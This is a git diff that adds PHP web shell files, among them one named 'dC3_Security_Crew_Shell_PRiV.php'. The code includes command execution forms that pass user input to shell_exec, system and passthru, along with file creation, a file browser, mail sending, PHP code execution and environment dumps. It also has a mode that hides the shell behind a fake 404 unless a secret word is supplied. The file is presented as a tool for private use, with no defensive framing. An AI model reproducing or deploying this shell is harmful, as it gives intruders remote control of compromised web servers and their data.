+<?php
+if (@is_writable($j_d)) {
+echo "<font color=green>[Ok]</font>";
+  } else {
+echo "<font color=red>[No]</font>";
+ }
+echo "</td><center><table width=360 height=40 border=\"1\" rules=\"groups\">
+
+  <thead>
+    <tr>
+      <th></th><td>";
+?>
+<form action=<?php echo $surl ?>&<?php echo $word ?>&mkfile method="post">
+name:&ensp;&ensp;&ensp;&ensp;&ensp; <input name="name" type="text">
+<input type="hidden" name="dir" value=<?php echo urlencode($_GET['file']) ?>>
+&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input type="submit" value="mkfile">
+</form>
+<?php
+if (@is_writable($j_d)) {
+echo "<font color=green>[Ok]</font>";
+  } else {
+echo "<font color=red>[No]</font>";
+ }
+echo "</td><center><table width=360 height=40 border=\"1\" rules=\"groups\">
+
+  <thead>
+    <tr>
+      <th></th><td>";
+?>
+<form action=<?php echo $surl ?>&<?php echo $word ?>&exec method="post">
+command: <input name="command" type="text">
+<input type="hidden" name="dir" value=<?php echo urlencode($_GET['file']) ?>>
+&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;&ensp;<input type="submit" value="execute">
+</form>
+<?php
+echo "</td><center><table border=\"1\" rules=\"groups\">
+  <thead>
+    <tr>
+
+      <th></th><td><a href=".$surl."?&".$word."&special_dir&file=".urlencode($filename).">Special DirOptions</a></td> ";
+echo "</a>";
+exit;
+  }
+?>
+
+
+
+<html>
+  <ul id="Navigation">
+    <li><a href=<?php echo $surl ?>&<?php echo $word ?>&file_browser&file=<?php echo  "." ?>>File_Browser</a></li>
+    <li><a href=<?php echo $surl ?>&<?php echo $word ?>&send_mail>Send Mail(s)</a></li>
+
+    <li><a href=<?php echo $surl ?>&<?php echo $word ?>&php_code>php_code</a></li>
+    <li><a href=<?php echo $surl ?>&<?php echo $word ?>&crypt>crypter</a></li>
+    <li><a href=<?php echo $surl ?>&<?php echo $word ?>&php_info>php_info()</a></li>
+    <li><a href=<?php echo $surl ?>&<?php echo $word ?>&defined_vars>defined_vars()</a></li>
+    <li><a href=<?php echo $surl ?>&<?php echo $word ?>&env>env()</a></li>
+
+    <li><a href=<?php echo $surl ?>&<?php echo $word ?>&update>update()</a></li>
+  </ul>
+<center><table border="1" rules="groups">
+  <thead>
+    <tr>
+     <th></th>
+       <td>
+<form action=<?php echo $surl ?>?&<?php echo $word ?>&exec_st method="post">
+
+<input type="submit" name="sub" value="Execute"><br>
+<br>
+<input type="text" name="command">
+<br>
+<input type="radio" name="method" value="1">shell_exec();
+<input type="radio" name="method" value="2">system();
+<input type="radio" name="method" value="3">passthru();
+<input type="radio" name="method" value="4">automatic();<br>
+<textarea name="exec" rows=15 cols=90>
+<?php
+if (isset($_GET['exec_st'])) {
+    $meth=$_POST['method'];
+      $com=$_POST['command'];
+        if (isset($meth)) {
+          if ($meth=="1") {
+            echo shell_exec($com);
+              }
+               elseif($meth=="2") {
+                 echo system($com); 
+                   }
+                  elseif ($meth=="3") {
+                    passthru($com);
+                     }
+                       elseif ($meth=="4") {
+                         if (function_exists(shell_exec)) {
+                            echo shell_exec($com);
+                              }
+                                 elseif (function_exists(system)) {
+                                   echo system($com);
+                                     }
+                                       elseif (function_exists(passthru)) {
+                                         echo passthru($com);
+                                           }
+                                             else {
+                                              echo "[-]Error";
+                                             }    
+                                          }
+                                       }
+                                    }
+echo "</textarea>";
+exit;
+?> 
\ No newline at end of file
diff --git a/php/dC3_Security_Crew_Shell_PRiV.php b/php/dC3_Security_Crew_Shell_PRiV.php
new file mode 100644
index 0000000..9e2069d
--- /dev/null
+++ b/php/dC3_Security_Crew_Shell_PRiV.php
@@ -0,0 +1,1274 @@
+<?PHP
+/* 
+ver=5
+----------------------Only For Priv8 Use---------------------------------
+               I dont support illegal actions!
+-------------------------------------------------------------------------
+          dC3 Security Crew
+-------------------------------------------------------------------------
+By turning "on" safe you can make your shell in 404 Not Find mode if the user doesnt know your OWN set word!
+-------------------------------------------------------------------------
+Shell written by Bl0od3r
+-------------------------------------------------------------------------
+Easy file managing with a lot of features!
+-------------------------------------------------------------------------
+In work:
+special file options
+-------------------------------------------------------------------------
+*/
+//important
+error_reporting(5);
+@ignore_user_abort(true);
+//
+
+$safe="off";
+$word="secret";
+if ($safe=="on") {
+if (!isset($_GET[$word])) {
+   header('HTTP/1.0 404 Not Found');
+   exit;
+   }
+ }
+$made_by="Bl0od3r";
+$of="Netplayazz";
+($made_by=="Bl0od3r") ? $fake=0 : $fake=1;
+($of=="dc3") ? $fake=0 :  $fake=1;
+$st_dir=".";
+$p=str_replace("\\","/",realpath($_GET['file']));
+$j_d=$_GET['file'];
+$j_f=$_GET['file'];
+$filename = $_GET['file'];
+$file_info = pathinfo($filename);
+$extn = $file_info['extension'];
+
+
+if (isset($_GET['dir'])) {
+ $images = array(
+"download"=>
+"R0lGODlhFAAUALMIAAD/AACAAIAAAMDAwH9/f/8AAP///wAAAP///wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAAUABQAAAROEMlJq704UyGOvkLhfVU4kpOJSpx5nF9YiCtLf0SuH7pu".
+"EYOgcBgkwAiGpHKZzB2JxADASQFCidQJsMfdGqsDJnOQlXTP38przWbX3qgIADs=",
+"ext_wri"=>
+"R0lGODlhEAAQADMAACH5BAEAAAgALAAAAAAQABAAg////wAAAICAgMDAwICAAAAAgAAA////AAAA".
+"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARRUMhJkb0C6K2HuEiRcdsAfKExkkDgBoVxstwAAypduoao".
+"a4SXT0c4BF0rUhFAEAQQI9dmebREW8yXC6Nx2QI7LrYbtpJZNsxgzW6nLdq49hIBADs=",
+"small_dir"=>
+"R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA".
+"AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp".
+"/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=",
+"dir"=>"iVBORw0KGgoAAAANSUhEUgAAABAAAAAQCAMAAAAoLQ9TAAAAkFBMVEX////MmTT/zGezgRvLmDN/
+f3/AjSi6hyK9iiWgbghra2vCjyr/5oGufBbHlC+jcQuwfhiIiIjJljGcagS1gh24hSCebAaZZwGa
+aAK0gRzvvFfcqUT4xWC8iSRKSkqreRPCwsK/jCeodhDms06lcw23hB/ToDv/1G//4HvFki3/64X/
+95Fqamr//////5n/9I54UBIWAAAAAXRSTlMAQObYZgAAAAFiS0dELc3aQT0AAAAWdEVYdFNvZnR3
+YXJlAGdpZjJwbmcgMi40LjakM4MXAAAAiUlEQVR42oXOxxKCMBgE4CWhVwEp9i4Ekt/3fzuDE0Yd
+D3633dnDAr8su0i/stKi40cmTfnebckXU2GPj8k0U0mui2KIxYu7q1acA2kv1CxWWQ7RWTTbUhAi
+YjaNxppqCZcJGowLlRI+O1FvbKiV8FhFnXGnJgT0n+RwvmZBXbbN3tFPHPnm4L8nl3EWVP90I8IA
+AAAASUVORK5CYII=",
+"o.b" => "/9j/4AAQSkZJRgABAgAAZABkAAD/7AARRHVja3kAAQAEAAAAUAAA/+IMWElDQ19QUk9GSUxFAAEB
+AAAMSExpbm8CEAAAbW50clJHQiBYWVogB84AAgAJAAYAMQAAYWNzcE1TRlQAAAAASUVDIHNSR0IA
+AAAAAAAAAAAAAAEAAPbWAAEAAAAA0y1IUCAgAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAARY3BydAAAAVAAAAAzZGVzYwAAAYQAAABsd3RwdAAAAfAAAAAUYmtw
+dAAAAgQAAAAUclhZWgAAAhgAAAAUZ1hZWgAAAiwAAAAUYlhZWgAAAkAAAAAUZG1uZAAAAlQAAABw
+ZG1kZAAAAsQAAACIdnVlZAAAA0wAAACGdmlldwAAA9QAAAAkbHVtaQAAA/gAAAAUbWVhcwAABAwA
+AAAkdGVjaAAABDAAAAAMclRSQwAABDwAAAgMZ1RSQwAABDwAAAgMYlRSQwAABDwAAAgMdGV4dAAA
+AABDb3B5cmlnaHQgKGMpIDE5OTggSGV3bGV0dC1QYWNrYXJkIENvbXBhbnkAAGRlc2MAAAAAAAAA
+EnNSR0IgSUVDNjE5NjYtMi4xAAAAAAAAAAAAAAASc1JHQiBJRUM2MTk2Ni0yLjEAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAFhZWiAAAAAAAADzUQABAAAA
+ARbMWFlaIAAAAAAAAAAAAAAAAAAAAABYWVogAAAAAAAAb6IAADj1AAADkFhZWiAAAAAAAABimQAA
+t4UAABjaWFlaIAAAAAAAACSgAAAPhAAAts9kZXNjAAAAAAAAABZJRUMgaHR0cDovL3d3dy5pZWMu
+Y2gAAAAAAAAAAAAAABZJRUMgaHR0cDovL3d3dy5pZWMuY2gAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAZGVzYwAAAAAAAAAuSUVDIDYxOTY2LTIuMSBEZWZhdWx0
+IFJHQiBjb2xvdXIgc3BhY2UgLSBzUkdCAAAAAAAAAAAAAAAuSUVDIDYxOTY2LTIuMSBEZWZhdWx0
+IFJHQiBjb2xvdXIgc3BhY2UgLSBzUkdCAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGRlc2MAAAAAAAAA
+LFJlZmVyZW5jZSBWaWV3aW5nIENvbmRpdGlvbiBpbiBJRUM2MTk2Ni0yLjEAAAAAAAAAAAAAACxS
+ZWZlcmVuY2UgVmlld2luZyBDb25kaXRpb24gaW4gSUVDNjE5NjYtMi4xAAAAAAAAAAAAAAAAAAAA
+AAAAAAAAAAAAAAB2aWV3AAAAAAATpP4AFF8uABDPFAAD7cwABBMLAANcngAAAAFYWVogAAAAAABM
+CVYAUAAAAFcf521lYXMAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAKPAAAAAnNpZyAAAAAAQ1JU
+IGN1cnYAAAAAAAAEAAAAAAUACgAPABQAGQAeACMAKAAtADIANwA7AEAARQBKAE8AVABZAF4AYwBo
+AG0AcgB3AHwAgQCGAIsAkACVAJoAnwCkAKkArgCyALcAvADBAMYAywDQANUA2wDgAOUA6wDwAPYA
++wEBAQcBDQETARkBHwElASsBMgE4AT4BRQFMAVIBWQFgAWcBbgF1AXwBgwGLAZIBmgGhAakBsQG5
+AcEByQHRAdkB4QHpAfIB+gIDAgwCFAIdAiYCLwI4AkECSwJUAl0CZwJxAnoChAKOApgCogKsArYC
+wQLLAtUC4ALrAvUDAAMLAxYDIQMtAzgDQwNPA1oDZgNyA34DigOWA6IDrgO6A8cD0wPgA+wD+QQG
+BBMEIAQtBDsESARVBGMEcQR+BIwEmgSoBLYExATTBOEE8AT+BQ0FHAUrBToFSQVYBWcFdwWGBZYF
+pgW1BcUF1QXlBfYGBgYWBicGNwZIBlkGagZ7BowGnQavBsAG0QbjBvUHBwcZBysHPQdPB2EHdAeG
+B5kHrAe/B9IH5Qf4CAsIHwgyCEYIWghuCIIIlgiqCL4I0gjnCPsJEAklCToJTwlkCXkJjwmkCboJ
+zwnlCfsKEQonCj0KVApqCoEKmAquCsUK3ArzCwsLIgs5C1ELaQuAC5gLsAvIC+EL+QwSDCoMQwxc
+DHUMjgynDMAM2QzzDQ0NJg1ADVoNdA2ODakNww3eDfgOEw4uDkkOZA5/DpsOtg7SDu4PCQ8lD0EP
+Xg96D5YPsw/PD+wQCRAmEEMQYRB+EJsQuRDXEPURExExEU8RbRGMEaoRyRHoEgcSJhJFEmQShBKj
+EsMS4xMDEyMTQxNjE4MTpBPFE+UUBhQnFEkUahSLFK0UzhTwFRIVNBVWFXgVmxW9FeAWAxYmFkkW
+bBaPFrIW1hb6Fx0XQRdlF4kXrhfSF/cYGxhAGGUYihivGNUY+hkgGUUZaxmRGbcZ3RoEGioaURp3
+Gp4axRrsGxQbOxtjG4obshvaHAIcKhxSHHscoxzMHPUdHh1HHXAdmR3DHeweFh5AHmoelB6+Hukf
+Ex8+H2kflB+/H+ogFSBBIGwgmCDEIPAhHCFIIXUhoSHOIfsiJyJVIoIiryLdIwojOCNmI5QjwiPw
+JB8kTSR8JKsk2iUJJTglaCWXJccl9yYnJlcmhya3JugnGCdJJ3onqyfcKA0oPyhxKKIo1CkGKTgp
+aymdKdAqAio1KmgqmyrPKwIrNitpK50r0SwFLDksbiyiLNctDC1BLXYtqy3hLhYuTC6CLrcu7i8k
+L1ovkS/HL/4wNTBsMKQw2zESMUoxgjG6MfIyKjJjMpsy1DMNM0YzfzO4M/E0KzRlNJ402DUTNU01
+hzXCNf02NzZyNq426TckN2A3nDfXOBQ4UDiMOMg5BTlCOX85vDn5OjY6dDqyOu87LTtrO6o76Dwn
+PGU8pDzjPSI9YT2hPeA+ID5gPqA+4D8hP2E/oj/iQCNAZECmQOdBKUFqQaxB7kIwQnJCtUL3QzpD
+fUPARANER0SKRM5FEkVVRZpF3kYiRmdGq0bwRzVHe0fASAVIS0iRSNdJHUljSalJ8Eo3Sn1KxEsM
+S1NLmkviTCpMcky6TQJNSk2TTdxOJU5uTrdPAE9JT5NP3VAnUHFQu1EGUVBRm1HmUjFSfFLHUxNT
+X1OqU/ZUQlSPVNtVKFV1VcJWD1ZcVqlW91dEV5JX4FgvWH1Yy1kaWWlZuFoHWlZaplr1W0VblVvl
+XDVchlzWXSddeF3JXhpebF69Xw9fYV+zYAVgV2CqYPxhT2GiYfViSWKcYvBjQ2OXY+tkQGSUZOll
+PWWSZedmPWaSZuhnPWeTZ+loP2iWaOxpQ2maafFqSGqfavdrT2una/9sV2yvbQhtYG25bhJua27E
+bx5veG/RcCtwhnDgcTpxlXHwcktypnMBc11zuHQUdHB0zHUodYV14XY+dpt2+HdWd7N4EXhueMx5
+KnmJeed6RnqlewR7Y3vCfCF8gXzhfUF9oX4BfmJ+wn8jf4R/5YBHgKiBCoFrgc2CMIKSgvSDV4O6
+hB2EgITjhUeFq4YOhnKG14c7h5+IBIhpiM6JM4mZif6KZIrKizCLlov8jGOMyo0xjZiN/45mjs6P
+No+ekAaQbpDWkT+RqJIRknqS45NNk7aUIJSKlPSVX5XJljSWn5cKl3WX4JhMmLiZJJmQmfyaaJrV
+m0Kbr5wcnImc951kndKeQJ6unx2fi5/6oGmg2KFHobaiJqKWowajdqPmpFakx6U4pammGqaLpv2n
+bqfgqFKoxKk3qamqHKqPqwKrdavprFys0K1ErbiuLa6hrxavi7AAsHWw6rFgsdayS7LCszizrrQl
+tJy1E7WKtgG2ebbwt2i34LhZuNG5SrnCuju6tbsuu6e8IbybvRW9j74KvoS+/796v/XAcMDswWfB
+48JfwtvDWMPUxFHEzsVLxcjGRsbDx0HHv8g9yLzJOsm5yjjKt8s2y7bMNcy1zTXNtc42zrbPN8+4
+0DnQutE80b7SP9LB00TTxtRJ1MvVTtXR1lXW2Ndc1+DYZNjo2WzZ8dp22vvbgNwF3IrdEN2W3hze
+ot8p36/gNuC94UThzOJT4tvjY+Pr5HPk/OWE5g3mlucf56noMui86Ubp0Opb6uXrcOv77IbtEe2c
+7ijutO9A78zwWPDl8XLx//KM8xnzp/Q09ML1UPXe9m32+/eK+Bn4qPk4+cf6V/rn+3f8B/yY/Sn9
+uv5L/tz/bf///+4AJkFkb2JlAGTAAAAAAQMAFQQDBgoNAAARtgAAF0YAABuaAAAgJv/bAIQAAgIC
+AgICAgICAgMCAgIDBAMCAgMEBQQEBAQEBQYFBQUFBQUGBgcHCAcHBgkJCgoJCQwMDAwMDAwMDAwM
+DAwMDAEDAwMFBAUJBgYJDQsJCw0PDg4ODg8PDAwMDAwPDwwMDAwMDA8MDAwMDAwMDAwMDAwMDAwM
+DAwMDAwMDAwMDAwM/8IAEQgAHgK8AwERAAIRAQMRAf/EALsAAQACAwEBAAAAAAAAAAAAAAADBQIE
+BgEHAQEAAAAAAAAAAAAAAAAAAAAAEAACAgMBAQADAQEBAAAAAAAAEwQFAiIDARQREhWAIyQRAAAE
+BQIDBwMBBwUAAAAAAAABAgMx0ZMENBEhEhMzQVFhkZLS4nGBIuEQQKGxYmMUMkKiIyQSAQAAAAAA
+AAAAAAAAAAAAAIATAAIBAgYDAAIDAQEAAAAAAAERACFRMUFhodHxEHGR8IFQgMGxMP/aAAwDAQAC
+EQMRAAAB+DlmAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAADmDnDbAAAAAAAAANg+hkJr
+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
+kASVTK8FiNrM/AhGUmWFC84tGEEIJ5RFIeaZNEkqJGAtGH9aGVEkQK9iYINvSQJEWxHx2GpQBhIZ
+Bwa5prvsetQWpqEgLI4+OzcwGApE5roM4Eu/YDCCBAMieFfBZSsOoDACQEHAbkYf0IZUWIX6nQJO
+w62AFEGLNU+OxSbDMMAANgOKD/1AqpAOSsWwMaELlEEQCYKpJE9qwuJkvAWgb+ClcKADkz4Up5Qz
+TxEJQAcyJrvsqBdIAhhBpJzmdAkR8IeVKsg9DCCV0agEguPOgXgsWiK8GNikQ4KIUpBfAIBQg4hg
+UfXgsdzaMhkEYAkEs+4YONNACBEVI48oB1UQAmcCjixmu+zXfZrvs132a77Nd9mu+zXfZrvs132a
+77Nd9mu+zXfZrvs132a77M4vHcD0bsgCNLS0tLS0tLS0tLS0tLS0tLS0tIQCaCCAiIIRIYxgGAAE
+DASu6kMCYrUEwf3KKyAa4AFNgEfJ07XjXnEUNgCkGnjzgoF87YASAqpafa6qSEAUEPAOQwIwUTBq
+M4GXOYNycAq0VeCVEHAwaqASwJA3vKOkSCoKklVYxMho3wRgMTBArTKiAKJDmW1ZMYNg04tgNRQA
+GRfqJaO7aLDIEaRCItkwsQioJeCRUlgMCuoUccoQc7MHmIirHwSa3ykQMExEkVRUH0VJkoAfoePN
+LB4gFFJyQcCcfBIXbhwohAYUGGRgsMQ9QNhxcYrSACA4olyporJJQTAYmCrSWztEgkcivHkkjWVT
+KECVLCNI5BU2AAEisiJBB8eTTWGAFQEBAOhizrgQGlgEml44rQwwYrgUMIDTlBFQzCyW1RRpsEBM
+llACB+vB1rBwQDohIMs84NBEfCBQcNho4ThDyEQUlvwUCNLS0tLS0tLS0tLS0tLS0tLS32X3K0CG
+YwXud1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1
+yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3
+XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yn
+dcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcp3XKd1yndcpi/Yhm9z//2gAI
+AQIDAT8Q/rB//9oACAEDAwE/EP6wf//Z");
+  header("Content-type: image/gif");
+  header("Cache-control: public");
+  header("Expires: ".date("r",mktime(0,0,0,1,1,2030)));
+  header("Cache-control: max-age=".(60*60*24*7));
+  header("Last-Modified: ".date("r",filemtime(__FILE__)));
+  echo base64_decode($images[$_GET['pic']]);
+}
+
+$ps=str_replace("\\","/",getenv('DOCUMENT_ROOT'));
+//file_array
+$file_tps=array(
+"img"=>array("jpg","bmp","gif","ico"),
+"act" => array("edit","copy","download","delete"),
+"zip" => array("gzip","zip","rar")
+);
+$surl_autofill_include = true; //If true then search variables with descriptors (URLs) and save it in SURL.
+
